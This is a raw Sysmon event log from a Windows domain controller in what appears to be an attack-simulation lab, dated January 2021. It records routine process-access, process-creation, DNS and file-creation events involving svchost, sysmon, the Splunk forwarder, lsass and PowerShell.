13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5A00-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.259{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429B-6000-5A00-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.273{08A6967A-429C-6000-6000-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 22542200x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.682{08A6967A-4286-6000-0B00-000000009A01}852win-dc-250010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.680{08A6967A-4298-6000-3100-000000009A01}2248win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.212{08A6967A-429B-6000-5D00-000000009A01}25763784C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.118{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.118{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.080{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_fsdu2grk.vte.ps12021-01-14 13:09:48.080 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.078{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.042{08A6967A-429C-6000-5F00-000000009A01}38843936C:\Windows\system32\conhost.exe{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.034{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429C-6000-5F00-000000009A01}3884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.030{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.029{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 